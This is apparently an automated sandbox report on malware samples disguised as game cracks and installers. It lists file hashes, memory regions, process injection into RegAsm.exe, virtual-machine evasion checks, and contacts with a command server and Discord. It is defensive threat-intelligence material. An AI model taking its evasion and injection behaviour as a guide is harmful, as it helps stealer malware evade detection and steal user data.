memory/1636-6-0x0000000074DCE000-0x0000000074DCF000-memory.dmp

memory/1636-7-0x0000000074DC0000-0x00000000754AE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KRC02O6IUKGLZGQQE61M.temp

MD5 17984f44880547c633aaa045d4cc8d28
SHA1 018ef977dce56c2b143228f334002a87f7d1bb31
SHA256 91349d976beb92ff111f28f378d7853e69287d6bf6a39e4a2444390df715300b
SHA512 b7a44e89ccba516be6440992c9c1423f57b50d12d2de681f6eaa166116f070c4c6a735e47e7c45d639dd64a425c93c79d8463f7eeed885c97f8dfc3bdc3bf0d6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 bad4aa35d2377b6a2906fadea728c258
SHA1 813663aabd6cd88bdff1958e48b950dea5a19046
SHA256 70c07d9167df0163ef649aae6c055c0504eb6dfc77755603cc8440d118aac3e5
SHA512 93a102a177a5ecf6b6f58543d712e579505eb231542858dbe078ab46c3c971b11ccf461ea41a0bae8d7efdfb5f2f0e3683eb214dbd889da9ac562c5de383a6fe

memory/1636-13-0x0000000004050000-0x00000000040A6000-memory.dmp

memory/1636-14-0x0000000004FC0000-0x0000000005040000-memory.dmp

memory/1636-40-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-78-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-76-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-74-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-72-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-70-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-68-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-66-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-64-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-62-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-60-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-58-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-56-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-54-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-52-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-50-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-48-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-46-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-44-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-42-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-38-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-36-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-34-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-32-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-30-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-28-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-26-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-24-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-22-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-20-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-18-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-16-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-15-0x0000000004FC0000-0x000000000503A000-memory.dmp

\Users\Admin\AppData\Local\Temp\RegAsm.exe

MD5 b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1 d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA256 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512 b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

memory/1636-2517-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/11756-2516-0x0000000000400000-0x000000000041E000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

System Binary Proxy Execution: Regsvcs/Regasm

defense_evasion
Description Indicator Process Target
Key opened \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2228 set thread context of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp

Files

memory/2228-0-0x0000000074C9E000-0x0000000074C9F000-memory.dmp

memory/2228-1-0x0000000000870000-0x00000000008CC000-memory.dmp

memory/2228-2-0x00000000058A0000-0x0000000005E44000-memory.dmp

memory/2228-3-0x00000000052F0000-0x0000000005382000-memory.dmp

memory/2228-4-0x00000000052C0000-0x00000000052CA000-memory.dmp

memory/2228-5-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/508-6-0x0000000002620000-0x0000000002656000-memory.dmp

memory/508-7-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/508-8-0x0000000005240000-0x0000000005868000-memory.dmp

memory/508-9-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/508-10-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/508-11-0x0000000005170000-0x0000000005192000-memory.dmp

memory/508-13-0x00000000058E0000-0x0000000005946000-memory.dmp

memory/508-12-0x0000000005870000-0x00000000058D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1gn1pe0c.fyf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/508-14-0x0000000005950000-0x0000000005CA4000-memory.dmp

memory/508-24-0x0000000005F50000-0x0000000005F6E000-memory.dmp

memory/508-25-0x0000000005FD0000-0x000000000601C000-memory.dmp

memory/508-26-0x0000000006F30000-0x0000000006FC6000-memory.dmp

memory/508-27-0x0000000006420000-0x000000000643A000-memory.dmp

memory/508-28-0x0000000006470000-0x0000000006492000-memory.dmp

memory/508-29-0x00000000081B0000-0x000000000882A000-memory.dmp

memory/508-32-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/2228-33-0x0000000074C9E000-0x0000000074C9F000-memory.dmp

memory/2228-34-0x0000000074C90000-0x0000000075440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6832ae680e8ddacc9752c84ff4ee94d5
SHA1 eba38e3a46f6a27ec29c567c6766ba57fe7954ba
SHA256 19c4f3bc855b449022b1baf50569236e2d844e3f323453291495de125f76e632
SHA512 9cea7dcd3b0bf6bb6c1fd15aea43312cb52926e2e61455fcb26a6dd82323e352b9960f4afe412891be2aba54230ef354772e5397df8c6100e5aab875247fa1ef

memory/944-36-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/944-37-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/944-47-0x00000000054F0000-0x0000000005844000-memory.dmp

memory/944-48-0x0000000074C90000-0x0000000075440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 055d49baa3f0709efb430f24f1f50269
SHA1 d04930cf95b31ae01fbfaedc237447c3ec9a6121
SHA256 93827dc1e9f7bbd451485b0b959c04df96a8b814c608373c166634c78aef27f4
SHA512 838d417e29646ab93ac5d8ec4f698174a81391cf477889ea660b5b812aaf84860454c6b36725092085297ad892c976bb045f6a94df7477a98b08a94da28f6033

memory/944-51-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/2228-52-0x00000000064C0000-0x0000000006516000-memory.dmp

memory/2228-53-0x0000000006510000-0x0000000006590000-memory.dmp

memory/2228-54-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-71-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-115-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-113-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-111-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-109-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-107-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-105-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-103-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-99-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-97-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-95-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-93-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-91-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-89-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-87-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-85-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-83-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-81-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-79-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-77-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-73-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-69-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-67-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-65-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-63-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-61-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-59-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-57-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-55-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-117-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-101-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-75-0x0000000006510000-0x000000000658A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

MD5 0d5df43af2916f47d00c1573797c1a13
SHA1 230ab5559e806574d26b4c20847c368ed55483b0
SHA256 c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512 f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

memory/2228-2543-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/6056-2542-0x0000000000400000-0x000000000041E000-memory.dmp

memory/6056-2544-0x0000000005620000-0x0000000005C38000-memory.dmp

memory/6056-2545-0x0000000005060000-0x0000000005072000-memory.dmp

memory/6056-2546-0x0000000005100000-0x000000000513C000-memory.dmp

memory/6056-2547-0x0000000005140000-0x000000000518C000-memory.dmp

memory/6056-2548-0x00000000053B0000-0x00000000054BA000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

117s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"

Signatures

Mercurial Grabber Stealer

stealer mercurialgrabber

Mercurialgrabber family

mercurialgrabber

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip4.seeip.org N/A N/A
N/A ip-api.com N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1848 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe C:\Windows\system32\WerFault.exe
PID 1848 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe C:\Windows\system32\WerFault.exe
PID 1848 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe C:\Windows\system32\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe

"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1848 -s 1400

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip4.seeip.org udp
US 23.128.64.141:443 ip4.seeip.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp

Files

memory/1848-0-0x000007FEF6033000-0x000007FEF6034000-memory.dmp

memory/1848-1-0x0000000000F20000-0x0000000000F30000-memory.dmp

memory/1848-2-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp

memory/1848-3-0x000007FEF6033000-0x000007FEF6034000-memory.dmp

memory/1848-4-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp

memory/1848-5-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20241010-en

Max time kernel

134s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Installer.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2116 set thread context of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
